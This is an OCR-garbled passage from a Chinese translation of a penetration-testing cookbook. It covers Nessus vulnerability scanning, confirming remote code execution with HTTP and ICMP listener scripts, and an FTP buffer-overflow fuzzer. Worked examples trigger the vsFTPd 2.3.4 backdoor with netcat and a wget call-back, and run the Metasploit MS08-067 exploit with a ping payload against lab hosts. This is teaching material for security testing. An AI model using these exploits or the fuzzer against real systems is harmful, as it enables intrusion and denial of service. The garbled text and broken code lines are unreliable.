Policy ，Folder ,和 Targets 。 Name 字段 仅 用 作 唯 一 标识 符 ， 以 将 扫描 结 
果 与 其 他 扫描 区 分 开 。 如 果 要 执行 大 量 扫描 ， 则 有 必要 非常 明确 扫描 名 称 。 第 二 个 
字段 是 芮 正定 义 扫描 的 所 有 细节 。 此 字段 允许 你 选择 要 使 用 的 扫描 策略 。 如 果 你 不 
熟悉 扫描 策略 的 工作 原理 ， 请 参阅 本 书 中 的 上 一 个 秘籍 。 登 录用 户 创建 的 任何 公共 
或 私有 扫描 策略 都 应 在 Policy 下 拉 菜 单 中 显示 。 Folder 字段 定义 将 放置 扫描 
结果 的 文件 夹 。 当 你 需要 对 大 量 扫描 结果 进行 排序 时 ， 在 文件 夹 中 组 织 扫 描 会 很 有 
帮助 。 可 以 通过 单 击 New Folder 从 Scans 主 菜单 创建 新 的 扫描 文件 夹 。 最 后 一 


个 字段 是 Targets 。 此 字段 显示 如 何 定义 要 扫描 的 系统 。 在 这 里 ， 你 可 以 输入 单 
个 主机 IP 地 址 ，IP 地 址 列表 ，IP 地 址 的 顺序 范围 ，CIDR 范 围 或 IP 范围 列表 。 RA? 
你 可 以 使 用 主机 名 ， 假 设 打 描 器 能 够 使 用 DNS 正 确 解析 为 IP 地 址 。 最 后 ， 还 有 一 个 
选项 用 于 上 传 文本 文件 ， 它 包含 任何 上 述 格 式 的 目标 列表 ， 像 这 样 : 


Basic Settings 
Name Example Scan! 
Policy Example Policy m 
Folder My Scans v 
Targets 172.16.36.0/24 
Upload Targets Add File 
配置 扫描 后 ， 可 以 使 用 屏幕 底部 的 Launch 按钮 来 执行 扫描 立即 将 扫描 添 
加 到 扫描 列表 ， 并 且 可 以 实时 查看 结果 ， ， 如 以 下 屏幕 截图 所 示 : 
My Scans 
Name Status 
Example Scan1 © Running 
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编码 用 于 快速 轻易 地 识别 漏洞 的 数量 及 其 严重 性 级 别 ， 如 以 下 屏幕 截图 所 示 : 
Example Scan1 
Scans > Hosts E Vulnerabilities Remediations 
Host Vulnerabilities a 96 
172.16.36.225 7 191 


172.16.36.135 d 91 


单 击 Example 扫描 后 ， 我 们 可 以 看 到 两 个 正在 扫描 的 主机 。 第 一 个 表示 扫描 完 
成 ， 第 二 个 主机 完成 了 2%。 Vulnerabilities 列 中 显示 的 条 形 图 显示 与 每 个 给 
定 主机 关联 的 漏洞 数量 。 或 者 ， 可 以 单 击 屏幕 顶部 的 Vulnerabilities 链接 ， 根 
据 发 现 的 漏洞 以 及 确定 该 漏洞 的 主机 数量 来 组 织 结果 。 在 屏幕 的 右 侧 ， 我 们 可 以 看 
到 类 似 的 人 饼 图 ， 但 这 一 个 对 应 于 所 有 扫描 的 主机 ， 如 以 下 屏幕 截图 所 示 : 


Scan Details 

Name: Example Scan1 
Folder My Scans 
Status: Running 
Policy: Example Policy 


Start time: Sun Mar 9 13:00:08 2014 


Vulnerabilities 


@ info 

"e Low 
@ Medium 
@ High 
@ Critical 





此 人 饼 图 还 清晰 定义 每 种 颜色 的 含义 ， 从 关键 漏洞 到 详细 信息 。 通过 选择 任何 特定 主 
机 IP 地 址 的 链接 ， 你 可 以 看 到 识别 为 该 主机 的 特定 漏洞 : 


此 漏洞 列表 标识 插件 名 称 ， 通 常会 给 出 发 现 和 严重 性 级 别 的 简要 说 明 。 作为 渗透 测 
试 程序 ， 如 果 你 要 在 目标 系统 上 实现 远程 代码 执行 ， 关 键 和 高 漏洞 通常 是 最 有 希望 
的 。 通 过 单 击 任何 一 个 特定 漏洞 ， 你 可 以 获得 该 漏洞 的 大 量 详细 信息 ， 如 以 下 屏幕 
截图 所 示 : 


Example Scan1 Expot v 


Hosts > 172.16.36.225 > Vulnerabilities 


Severity ^ Plugin Name Count 
MS05-027: Vulnerability in SMB Could Allow Remote Code Exec... 1 
MS06-040: Vulnerability in Server Service Could Allow Remote C... 1 
MS08-067: Microsoft Windows Server Service Crafted RPC Req... 1 
MS09-001: Microsoft Windows SMB Vulnerabilities Remote Cod... 1 


除了 描述 和 修补 信息 之 外 ， 该 页 面 还 将 为 进一步 研究 提供 替代 来 源 ， 最 重要 的 是 
(对 于 渗透 测试 人 员 ) 显示 是 否 存在 漏洞 。 此 页 面 通常 还 会 表明 可 用 的 利用 是 否 是 
公开 的 利用 ， 或 者 是 否 存 在 于 利用 框架 (如 Metasploit，CANVAS 或 Core 

Impact) 中 。 


工作 原理 


大 多 数 漏洞 扫描 程序 会 通过 评估 多 个 不 同 的 响应 来 尝试 确定 系统 是 否 容易 受 特 定 攻 
击 。 一 些 情况 下 ， 漏 洞 扫描 可 以 简化 为 与 远程 服务 建立 TCP 连 接 并 且 通 过 自我 公开 
的 特征 ， 识 别 已 知 的 漏洞 版 本 。 在 其 他 情况 下 ， 可 以 向 远程 服务 发 送 一 系列 复杂 的 
特定 的 探测 请 求 ， 来 试图 请 求 对 服务 唯一 的 响应 ， 该 服务 易 受 特定 的 攻击 。 
Nessus 同 时 执行 大 量 测试 ， 来 试图 为 给 定 目标 生成 完整 的 攻击 面 图 像 。 


5.5 Nessuscmd 命令 行 扫描 


Nessuscmd 是 Nessus 中 的 命令 行 工 具 。 如 果 你 希望 将 Nessus 插 件 扫描 集成 到 脚 
本 ， 或 重新 评估 先前 发 现 的 漏洞 ，Nessuscmd 可 能 非常 有 用 。 


准备 


要 在 Nessus 中 配置 扫描 策略 ， 必 须 首 先 在 Kali Linux 渗 透 测 试 平台 上 安装 Nessus 的 
功能 副本 。 因为 Nessus 是 一 个 需要 许可 的 产品 ， 它 不 会 在 Kali 默 认 安 装 。 有关 如 
何在 Kali 中 安装 Nessus 的 更 多 信息 ， 请 参阅 第 一 章 中 的 “Nessus 安装 "秘籍 。 


操作 步骤 


你 需要 切换 到 包含 nessuscmd 脚 本 的 目录 来 开始 。 然后， 通过 不 提供 任何 参数 来 执 
行 脚本 ， 你 可 以 查看 包含 相应 用 法 和 可 用 选项 的 输出 ， 如 下 所 示 : 


root@KaliLinux:~# cd /opt/nessus/bin/ 
root@KaliLinux:/opt/nessus/bin# ./nessuscmd 

Error - no target specified 

nessuscmd (Nessus) 5.2.5 [build N25109] 

Copyright (C) 1998 - 2014 Tenable Network Security, Inc 
Usage: 

nessuscmd <option> target... 


为 了 使 用 已 知 的 Nessus 插 件 |D 对 远程 主机 执行 hessuscmd 扫 描 ， 必 须 使 用 -i 参 
数 ， 并 提供 所 需 的 插件 ID 的 值 。 出 于 演示 目的 ， 我 们 使 用 知名 的 MS08-067 漏 洞 的 
插件 ID 执行 扫描 ， 如 下 所 示 : 


root@KaliLinux:/opt/nessus/bin# ./nessuscmd -i 34477 172.16.36.1 


35 
Starting nessuscmd 5.2.5 
Scanning '172.16.36.135'... 


+ Host 172.16.36.135 is up 
第 一 次 扫描 在 不 容易 受到 指定 插件 测试 的 漏洞 攻击 的 主机 上 执行 。 输 出 显 式 主机 已 


启动 ， 但 未 提供 其 他 输出 。 或 者 ， 如 果 系 统 存在 漏洞 ， 会 返回 对 应 这 个 插件 的 输 
出 ， 像 这 样 : 


root@KaliLinux:/opt/nessus/bin# ./nessuscmd -i 34477 172.16.36.2 
25 

Starting nessuscmd 5.2.5 

Scanning '172.16.36.225'... 


- Results found on 172.16.36.225 
- Port microsoft-ds (445/tcp) 
[!] Plugin ID 34477 
| 
| Synopsis 
| 
| 


| Arbitrary code can be executed on the remote host due to 
a flaw 
| in the 
'Server' service. 


| 

| 

| Description 

| 

| 

| The remote host is vulnerable to a buffer overrun in the 
'Server' 

| service that may allow an attacker to execute arbitrary c 

| the 


remote host with the 'System' privileges. 
See also 


http://technet.microsoft.com/en-us/security/bulletin/ms0O8 


-067 

Solution 

Microsoft has released a set of patches for Windows 2000, 
XP, 2003, 


Vista and 2008. 


Risk factor 


Critical / CVSS Base Score : 10.0 
(CVSS2ZAV : N/AC:L/Au:N/C:C/I:C/A:C) 
CVSS Temporal Score : 8.7 
(CVSS2#E:H/RL:OF/RC:C) 

Public Exploit Available : true 
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工作 原理 


大 多 数 漏洞 扫描 程序 会 通过 评估 多 个 不 同 的 响应 来 党 试 确定 系统 是 否 容易 受 特 定 攻 
击 。 一 些 情 况 下 ， 漏 洞 扫描 可 以 简化 为 与 远程 服务 建立 TCP 连 接 并 且 通 过 自我 公开 
的 特征 ， 识 别 已 知 的 漏洞 版 本 。 在 其 他 情况 下 ， 可 以 向 远程 服务 发 送 一 系列 复杂 的 
特定 的 探测 请 求 ， 来 试图 请 求 对 服务 唯一 的 响应 ， 该 服务 易 受 特定 的 攻击 。 
Nessuscmd 执 行 相同 的 测试 ， 或 者 由 常规 Nessus 接 口 ， 给 定 一 个 特定 的 插件 ID 来 
执行 。 唯 一 的 区 别 是 执行 漏洞 扫描 的 方式 。 


5.6 使 用 HTTP 交互 来 难 证 漏洞 


作为 渗透 测试 者 ， 任 何 给 定 漏洞 的 最 佳 结 果 是 实现 远程 代码 执行 。 但是， 在 某 些 情 
况 下 ， 我 们 可 能 只 想 确 定 远程 代码 执行 漏洞 是 否 可 利用 ， 但 不 想 实际 遵循 整个 利用 
和 后 续 利 用 过 程 。 执行 此 操作 的 一 种 方法 是 创建 一 个 Web 服 务 器 ， 该 服务 器 将 记录 
交互 并 使 用 给 定 的 利用 来 执行 将 代码 ， 使 远程 主机 与 Web 服 务 器 交互 。 此 秘籍 战 死 
了 如 何 编写 自 定义 脚 本 ， 用 于 使 用 HTTP 流 量 验 证 远程 代码 执行 漏洞 。 


准备 


要 使 用 HTTP 交 互 验证 漏洞 ， 你 需要 一 个 运行 拥有 远程 代码 执行 漏洞 的 软件 的 系 
统 。 此 外 ， 本 节 需 要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 
关 编 写 脚本 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 

Nano) "秘籍 。 


在 实际 利用 给 定 的 漏洞 之 前 ， 我 们 必须 部 署 一 个 Web 服 务 器 ， 它 会 记录 与 它 的 交 
互 。 这 可 以 通过 一 个 简单 的 Python 脚本 来 完成 ， 如 下 所 示 : 


#!/usr/bin/python 
import socket 
print "Awaiting connection...\n" 


httprecv = socket.socket(socket.AF INET, socket.SOCK STREAM) 
httprecv.setsockopt(socket.SOL SOCKET, socket.SO REUSEADDR, 1) 
httprecv.bind(("0.0.0.0",8000)) 

httprecv.listen(2) 


(client, ( ip,sock)) - httprecv.accept() 
print "Received connection from : ", ip 
data - client.recv(4096) 

print str(data) 


client.close() 
httprecv.close() 


这 个 Python 脚本 使 用 套 接 字 库 来 生成 一 个 Web 服 务 器 ， 该 服务 器 监听 所 有 本 地 接口 
的 TCP 8000 端口 。 接收 到 来 自 客 户 端的 连接 时 ， 脚 本 将 返回 客户 端的 IP 地 址 和 发 
送 的 请 求 。 为 了 使 用 此 脚本 验证 漏洞 ， 我 们 需要 执行 代码 ， 使 远程 系统 与 托管 的 
Web 服 务 进 行 交 互 。 但 在 这 之 前 ， 我 们 需要 使 用 以 下 命令 启动 我 们 的 脚本 : 


root@KaliLinux:~# ./httprecv.py 
Awaiting connection... 
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的 Nessus 扫 描 结 果 ， 我 们 可 以 看 到 运行 的 FTP 服 务 有 一 个 后 门 ， 可 以 通过 提供 带 有 
笑脸 的 用 户 名 来 触发 。 没 有 开玩笑 ...... 这 实际 上 包含 在 FTP 生产 服务 中 。 ATE 
试 利 用 它 ， 我 们 将 首先 使 用 适当 的 用 户 名 连接 到 服务 ， 如 下 所 示 : 


root@KaliLinux:~# ftp 172.16.36.135 21 

Connected to 172.16.36.135. 

220 (vsFTPd 2.3.4) 

Name (172.16.36.135:root): Hutch:) 

331 Please specify the password. 

Password: 

^C 

421 Service not available, remote server has closed connection 


尝试 连接 到 包含 笑脸 的 用 户 名 后 ， 后 门 应 该 在 远程 主机 的 TCP 端 口 6200 上 打开 。 我 
们 甚至 不 需要 输入 密码 。 反之， Ctrl + C 可 用 于 退出 FTP 客 户 端 ， 然 后 可 以 使 
用 Netcat 连 接 到 打开 的 后 门 ， 如 下 所 示 : 


root@KaliLinux:~# nc 172.16.36.135 6200 
wget http://172.16.36.224:8000 
--04:18:18-- http://172.16.36.224:8000/ 
-» "index.html' 
Connecting to 172.16.36.224:8000... connected. 
HTTP request sent, awaiting response... No data received. 
Retrying. 


--04:18:19-- http://172.16.36.224:8000/ 

(try: 2) -» "index.html' 
Connecting to 172.16.36.224:8000... failed: Connection refused. 
^C 


与 开放 端口 建立 TCP 连 接 后 ， 我 们 可 以 使 用 我 们 的 脚本 来 验证 ， 我 们 是 否 可 以 进行 
远程 代码 执行 。 为 此 ， 我 们 尝试 以 HTTP 检测 服务 器 的 URL 使 用 wget 。 尝试 
执行 此 代码 后 ， 我 们 可 以 通过 查看 脚本 输出 来 验证 是 否 收 到 了 HTTP 请 求 : 


root@KaliLinux:~# ./httprecv.py 

Received connection from : 172.16.36.135 
GET / HTTP/1.0 

User-Agent: Wget/1.10.2 

Accept: */* 

Host: 172.16.36.224:8000 

Connection: Keep-Alive 


工作 原理 


此 脚本 的 原理 是 识别 来 自 远程 主机 的 连接 尝试 。 执 行 代码 会 导致 远程 系统 连接 回 我 
们 的 监听 服务 器 ， 我 们 可 以 通过 利用 特定 的 漏洞 来 验证 远程 代码 执行 是 否 存 在 。 在 
远程 服务 器 未 安装 wget 或 curl 的 情况 下 ， 可 能 需要 采用 另 一 种 手段 来 识别 远 
程 代码 执行 。 


5.7 使 用 ICMP 交互 来 验证 漏洞 


作为 渗透 测试 者 ， 任 何 给 定 漏 洞 的 最 佳 结 果 是 实现 远程 代码 执行 。 但是， 在 某 些 情 
况 下 ， 我 们 可 能 只 想 确 定 远 程 代码 执行 漏洞 是 否 可 利用 ， 但 不 想 实 际 遵循 整个 利用 
和 后 续 利 用 过 程 。 一 种 方法 是 运行 一 个 脚本 ， 记 录 ICMP 流 量 ， 然 后 在 远程 系统 上 
执行 ping 命 令 。 该 秘籍 演示 了 如 何 编写 自 定 义 脚 本 ， 用 于 使 用 ICMP 流 量 验证 远程 
代码 执行 漏洞 。 


准备 
要 使 用 ICMP 交 互 验证 漏洞 ， 你 需要 一 个 运行 拥有 远程 代码 执行 漏洞 的 软件 的 系 
统 。 此 外 ， 本 节 需 要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 


关 编 写 脚本 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 
Nano) "秘籍 。 


操作 步骤 


在 实际 利用 给 定 漏 洞 之 前 ， 我 们 必须 部 署 一 个 脚本 ， 来 记录 传 入 的 ICMP 流 量 。 这 
可 以 通过 使 用 Scapy 的 简单 Python 脚本 完成 ， 如 下 所 示 : 


#!/usr/bin/python 


import logging 
logging. getLogger("scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 


def rules(pkt): 
Ery: 
if (pkt[IP].dst=="172.16.36.224") and (pkt[ICMP]): 
print str(pkt[IP].src) + " is exploitable" 
except: 
pass 


print “Listening for Incoming ICMP Traffic. Use Ctrl+C to stop 
listening" 


sniff (lfilter=rules, store=0) 


这 个 Python 脚本 监听 所 有 传 入 的 流量 ， 并 将 发 往 扫 描 系统 的 任何 ICMP 流 量 的 源 标 
记 为 存在 漏洞 。 为 了 使 用 此 脚本 验证 漏洞 是 否 能 够 利用 ， 我 们 需要 执行 代码 ， 使 远 
程 系统 ping 我 们 的 扫描 系统 。 为 了 演示 这 一 点 ， 我 们 可 以 使 用 Metasploit 来 利 
用 远程 代码 执行 漏洞 。 但 在 这 之 前 ， 我 们 需要 局 动 我 们 的 脚本 ， 如 下 : 


root@KaliLinux:~# ./listener.py 
Listening for Incoming ICMP Traffic. Use Ctrl+C to stop listeni 


ng 


接 下 来 ， 我 们 需要 利用 导致 远程 代码 执行 的 漏洞 。 通 过 检查 Windows XP 框 的 
Nessus 扫描 结果 ， 我 们 可 以 看 到 系统 容易 受到 MS08-067 漏洞 的 攻击 。 为 了 验证 
这 一 点 ， 我 们 使 用 执行 ping 命令 的 载荷 ， 使 其 ping 我 们 的 扫描 系统 来 利用 汤 
洞 ， 如 下 所 示 : 


msf > use exploit/windows/smb/ms0O8 067 netapi 

msf  exploit(ms08 067 netapi) > set PAYLOAD windows/exec 

PAYLOAD -» windows/exec 

msf  exploit(ms08 067 netapi) > set RHOST 172.16.36.225 

RHOST -» 172.16.36.225 

msf  exploit(msO8 067 netapi) > set CMD cmd /c ping 172.16.36.22 
4 -n 1 

CMD => cmd /c ping 172.16.36.224 -n 1 

msf exploit(ms08_067_netapi) > exploit 


[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: windows XP SP2 English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 


Metasploit 中 的 利用 配置 为 使 用 windows / exec 载荷 ， 它 在 被 利用 系统 中 执行 代 
Aho 此 载荷 配置 为 向 我 们 的 扫描 系统 发 送 单个 ICMP 回 显 请 求 。 执行 后 ， 我 们 可 以 
通过 查看 仍 在 监听 的 原始 脚本 来 确认 漏洞 利用 是 否 成 功 ， 如 下 所 示 : 


root@KaliLinux:~# ./listener.py 
Listening for Incoming ICMP Traffic. Use Ctrl+C to stop listeni 
ng 


172.16.36.225 is exploitable 


工作 原理 


此 脚本 的 原理 是 监听 来 自 远程 主机 的 传 入 的 ICMP 流 量 。 通 过 执行 代码 ， 使 远程 系 
统 向 我 们 的 监听 服务 器 发 送 回 显 请 求 ， 我 们 可 以 通过 利用 特定 的 漏洞 来 验证 远程 代 


码 执行 是 否 可 以 利用 。 


第 六 章 拒绝 服务 


作者 : Justin Hutchens 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


任何 时 候 ， 当 你 通过 互联 网 访问 公开 资源 ， 甚 至 通过 内 部 网 络 访问 小 型 社区 时 ， 重 
要 的 是 要 考虑 拒绝 服务 (DOS) 攻击 的 风险 。DoS X 9 86 A AGB de * FAD fe 
JER Ho HART ADS > ESE I EEE HELE AR Ro 为 了 能 够 正确 
评估 对 网 络 和 信息 资源 的 威胁 ， 必 须 了 解 现 有 的 DoS 威胁 的 类 型 以 及 与 之 相关 的 
趋势 。 


在 单独 讨论 列 出 的 每 个 秘籍 之 前 ， 我 们 应 该 强调 一 些 基 本 原则 ， 并 了 解 它们 如 何 与 
本 章 中 讨论 的 DoS 攻击 相关 。 我 们 将 在 接 下 来 的 秘籍 中 讨论 的 DoS 攻击 可 以 分 为 
缓冲 区 溢出 ， 流 量 放大 攻击 或 资源 消耗 攻击 。 我 们 将 按 此 顺序 讨论 与 这 些 类 型 的 攻 
击 的 工作 原理 相关 的 一 般 原 则 。 


缓冲 区 溢出 是 一 种 编程 漏洞 ， 可 能 导致 应 用 程序 ， 服 务 或 整个 底层 操作 系统 的 拒绝 
服务 。 一 般 来 说 ， 缓冲 区 溢出 能 够 导致 拒绝 服务 ， 因 为 它 可 能 导致 任意 数据 被 加 载 
到 非 预期 的 内 存 段 。 这 可 能 会 中 断 执行 流程 ， 并 导致 服务 或 操作 系统 崩溃 。 流量 

放大 DoS 攻击 能 够 通过 消耗 特定 服务 器 ， 设 备 或 网 络 可 用 的 网 络 带 宽 来 产生 DOS 

条 件 。 流 量 放大 攻击 需要 两 个 条 件 才 能 成 功 。 这 些 条 件 如 下 


e 重 定向 : 攻击 者 必须 能 够 请 求 可 以 重 定向 到 受害 者 的 响应 。 这 通常 通过 P 
骗 来 实现 。 AA UDP 不 是 面向 连接 的 协议 ， 所 以 使 用 UDP 作为 其 相关 的 传 
输 层 协议 的 大 多 数 应 用 层 协 议 ， 可 以 用 于 通过 伪造 的 请 求 ， 将 服务 响应 重 定向 
到 其 他 主机 。 

e 放大 : 重 定向 的 响应 必须 大 于 请 求 该 响应 的 请 求 。 响应 字 节 大 小 和 请 求 字 节 大 
小 的 比率 越 大 ， 攻 击 就 越 成 功 。 


例如 ， 如 果 发 现 了 生成 10 倍 于 相关 请 求 的 响应 的 UDP 服务 ， 则 攻击 者 可 以 利用 该 
服务 来 潜在 地 生成 10 倍 的 攻击 流量 ， 而 不 是 通过 将 伪造 的 请 求 发送 到 漏洞 服务 ， 
以 可 能 最 高 的 速率 传输 。 资源 消耗 攻击 是 产生 如 下 的 条 件 的 攻击 ， 其 中 主机 服务 器 
或 设备 的 本 地 资源 被 消耗 到 一 定 程度 ， 使 得 这 些 资源 不 再 能 够 用 于 执行 其 预期 "t 
作 功 能 。 这 种 类 型 的 攻击 可 以 针对 各 种 本 地 资源 ， 包 括 内 存 ， 处 理 器 性 能 ， 磁 盘 空 
间或 并 发 网 络 连 接 的 可 持续 性 。 


6.1 使 用 模糊 测试 来 识别 续 冲 区 溢出 


只 别 缓冲 区 溢出 漏洞 的 最 有 效 的 技术 之 一 是 模糊 测试 。 模糊 测试 通过 将 精巧 的 或 随 
机 数据 传递 结 全 函数 ， 来 测试 与 各 种 输入 相关 的 结果 。 在 正确 的 情况 下 ， 输 入 数据 可 
能 逃离 其 指 定 的 缓冲 区 ? 并 流入 相 邻 的 寄存 器 SX P 9 此 过 程 将 中 断 执行 流程 并 
导致 应 用 程序 或 系统 崩溃 。 在 某 些 情况 下 ， 缓 冲 区 溢出 漏洞 也 可 以 用 于 执行 未 经 授 
权 的 代码 。 在 这 个 秘籍 中 ， 我 们 会 讨论 如 何 通过 开发 自 定 义 的 Fuzzing 工 具 ， 来 测 
试 缓 冲 区 溢出 漏洞 。 


准备 


为 了 执行 远程 模糊 测试 ， 你 需要 有 一 个 运行 TCP 或 UDP 网 络 服务 的 系统 。 在 提 
供 的 示例 中 ， 使 用 了 拥有 FTP 服务 的 Windows XP 系统 。 有 关 设 置 Windows f 
统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 的 “安装 Windows Server" 秘 籍 。 此 外 ， 本 节 需 
要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚 本 的 更 多 
言 息 ， 请 参阅 本 书 第 一 章 的 "使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


工作 原理 


Python 是 一 种 优盘 的 脚本 语言 ， 可 用 于 高 效 开 发 自 定 义 的 模糊 测试 工具 。 当 评 估 
TCP 服务 时 ， 套 接 字 函 数 可 用 于 简化 执行 完全 三 次 握手 序列 ， 和 连接 到 监听 服务 端 
口 的 过 程 。 任何 模糊 脚本 的 主要 目的 是 ， 将 数据 作为 输入 发 送 到 任何 给 定 的 函数 并 
评估 结果 。 我 开发 了 一 个 脚本 ， 可 以 用 来 模糊 测试 FTP 服务 的 验证 后 的 功能 ， 如 
下 所 示 : 


#!/usr/bin/python 


import socket 
import sys 


if len(sys.argv) != 6: 

print "Usage - ./ftp_fuzz.py [Target-IP] [Port Number] [Payl 
oad] [Interval] [Maximum]" 

print "Example -= .7ftp-fuzz.py 10.0.0.5 21 A 100 1000" 

print "Example will fuzz the defined FTP service with a seri 
es of payloads" 

print "to include 100 'A's, 200 'A's, etc... up to the maxim 
um of 1000" 

sys.exit() 


target = str(sys.argv[1]) 

port = int(sys.argv[2]) 

char = str(sys.argv[3]) 

i = int(sys.argv[4]) 

interval = int(sys.argv[4]) 

max = int(sys.argv[5]) 

user = raw_input(str("Enter ftp username: ")) 

passwd = raw_input(str("Enter ftp password: ")) 

command = raw_input(str("Enter FTP command to fuzz: ")) 


while i <= max: 
try: 
payload = command + " " + (char * i) 
print "Sending " + str(i) + " instances of payload (" + 
char + ") to target" 
s-socket.socket(socket.AF INET, socket.SOCK STREAM) 


connect=s.connect((target, port) ) 
.recv(1024) 
.Send('USER ' + user + '\r\n') 
.recv(1024) 
.send('PASS ' + passwd + '\r\n') 
.recv(1024) 
.send(payload + '\r\n') 
.send( 'QUIT\r\n') 
.recv(1024) 
.close() 
i = i + interval 
except: 
print "\nUnable to send...Server may have crashed" 
sys.exit() 


NNNnnn 


print "\nThere is no indication that the server has crashed" 


脚本 的 第 一 部 分 定义 了 Python 解释 器 的 位 置 ， 并 导入 所 需 的 库 。 第 二 部 分 检查 提 
供 的 参数 数量 ， 以 确保 其 与 脚本 的 适当 用 法 一 致 。 脚 本 的 第 三 部 分 定义 将 在 整个 脚 
本 执行 期 间 使 用 的 变量 。 其 中 几 个 变量 从 系统 参数 中 接收 到 它们 的 值 ， 这 些 参 数 在 
执行 时 传递 给 脚本 。 剩余 的 变量 通过 接受 脚本 的 用 户 的 输入 来 定义 。 最 后 ， 脚 本 

的 其 余部 分 定义 了 模糊 测试 过 程 。 我们 执行 ftp fuzz.py 文件 ， 如 下 : 


root@KaliLinux:~# ./ftp fuzz.py 

Usage - ./ftp fuzz.py [Target-IP] [Port Number] [Payload] [Inter 
val] [Maximum] 

Example - ./ftp fuzz.py 10.0.0.5 21 A 100 1000 

Example will fuzz the defined FTP service with a series of paylo 
ads to include 100 'A's, 200 'A's, etc... up to the maximum of 1 
000 

root@KaliLinux:~# ./ftp fuzz.py 172.16.36.134 21 A 100 1000 
Enter ftp username: anonymous 

Enter ftp password: user@mail.com 

Enter FTP command to fuzz: MKD 


Sending 100 instances of payload (A) to target 
Sending 200 instances of payload (A) to target 
Sending 300 instances of payload (A) to target 
Sending 400 instances of payload (A) to target 
Sending 500 instances of payload (A) to target 
Sending 600 instances of payload (A) to target 
Sending 700 instances of payload (A) to target 
Sending 800 instances of payload (A) to target 
Sending 900 instances of payload (A) to target 
Sending 1000 instances of payload (A) to target 


There is no indication that the server has crashed 


如 果 脚 本 在 没有 适当 数量 的 系统 参数 的 情况 下 执行 ， 脚 本 将 返回 预期 的 用 法 。 有 人 几 
个 值 必 须 作 为 系统 参数 来 包含 。 要 传递 给 脚本 的 第 一 个 参数 是 目标 IP 地址。 此 IP 
地 址 是 与 运行 所 需 模糊 测试 的 FTP 服务 的 系统 相关 的 IP 地址。 下 一 个 参数 是 运行 
FTP 服务 的 端口 号 。 在 大 多 数 情况 下 ，FTP 在 TCP 端口 21 中 和 运行。 载荷 定 义 了 
要 批量 传递 到 服务 的 字符 或 字符 序列 。 interval 参数 定义 了 在 一 次 迭代 中 传递 
给 FTP 服务 的 载荷 实例 数 。 参 数 也 是 这 样 的 数量 ， 通 过 该 数量 ， 载 荷 实例 的 数量 
将 随 着 每 次 连续 和 迭代 增加 到 最 大 值 。 此 最 大 值 由 最 后 一 个 参数 的 值 定 义 。 在 使 用 这 
些 系统 参数 执行 脚本 后 ， 它 将 请 求 FTP 服务 的 身份 验证 赁 证 ， 并 询问 应 该 对 哪个 
身份 验证 后 的 功能 进行 模糊 测试 。 在 提供 的 示例 中 ， 模 糊 测 试 对 IP 地 

址 172.16.36.134 的 Windows XP 主机 的 TCP 端口 21 上 运行 的 FTP 服务 执 
行 。 匿 名 登录 和 凭据 传递 给 了 具有 任意 电子 邮件 地 址 的 FTP 服务 。 此 外 ， 一 系列 As 
被 传递 到 MKD 验证 后 的 功能 ， 从 100 个 实例 开始 ， 并 每 次 增加 100， 直 到 达到 最 
大 1000 个 实例 。 同 样 的 脚本 也 可 以 用 来 传递 载荷 中 的 一 系列 字符 : 


root@KaliLinux:~# ./ftp fuzz.py 172.16.36.134 21 ABCD 100 500 
Enter ftp username: anonymous 

Enter ftp password: user@mail.com 

Enter FTP command to fuzz: MKD 

Sending 100 instances of payload (ABCD) to target 

Sending 200 instances of payload (ABCD) to target 

Sending 300 instances of payload (ABCD) to target 

Sending 400 instances of payload (ABCD) to target 

Sending 500 instances of payload (ABCD) to target 


There is no indication that the server has crashed 


在 所 提供 的 示例 中 ， 载 荷 被 定义 为 ABCD ， 并 且 该 载荷 的 实例 被 定义 为 100 HE 
数 ， 直 到 最 大 值 500。 


工作 原理 


一 般 来 说 ， 缓 冲 区 溢出 能 够 导致 拒绝 服务 ， 因 为 它们 可 能 导致 任意 数据 被 加 载 到 非 
预期 的 内 存 段 。 这 可 能 中 断 执 行 流程 ， 并 导致 服务 或 操作 系统 谣 溃 。 此 秘籍 中 讨 
论 的 特定 脚本 的 工作 原理 是 ， 在 服务 或 操作 系统 崩溃 的 情况 下 ， 套 接 字 将 不 再 接受 
输入 ， 并 且 脚 本 将 无 法 完成 整个 载荷 注入 序列 。 如 果 发 生 这 种 情况 ， 脚 本 需要 使 
用 ctrl + c 强制 关闭 。 在 这 种 情况 下 ， 脚 本 会 返回 一 个 标志 ， 表 示 后 续 的 载荷 无 
法 发 送 ， 并 且 服 务 器 可 能 已 崩溃 。 


6.2 FTP 远程 服务 的 缓冲 区 溢出 DoS 攻击 


在 正确 的 情况 下 ， 和 输入 数据 可 能 逃离 其 指定 的 缓冲 区 并 流入 相 邻 的 寄存 器 或 内 存 
段 。 此 过 程 将 中 断 执 行 流程 并 导致 应 用 程序 或 系统 崩溃 。 在 某 些 情况 下 ， 缓 冲 区 
溢出 漏洞 也 可 以 用 于 执行 未 经 授权 的 代码 。 在 这 个 特定 的 秘籍 中 ， 我 们 基于 Cesar 
0.99 FTP 服务 的 缓冲 区 溢出 ， 展 示 如 何 执行 DOS 攻击 的 示例 。 


准备 


为 了 执行 远程 模糊 测试 ， 你 需要 有 一 个 运行 TCP 或 UDP 网 络 服务 的 系统 。 在 提 
供 的 示例 中 ， 使 用 了 拥有 FTP 服务 的 Windows XP 系统 。 有 关 设 置 Windows 系 
统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 的 “安装 Windows Server 秘 籍 。 此 外 ， 本 节 需 
要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有关 编写 脚本 的 更 多 
言 息 ， 请 参阅 本 书 第 一 章 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


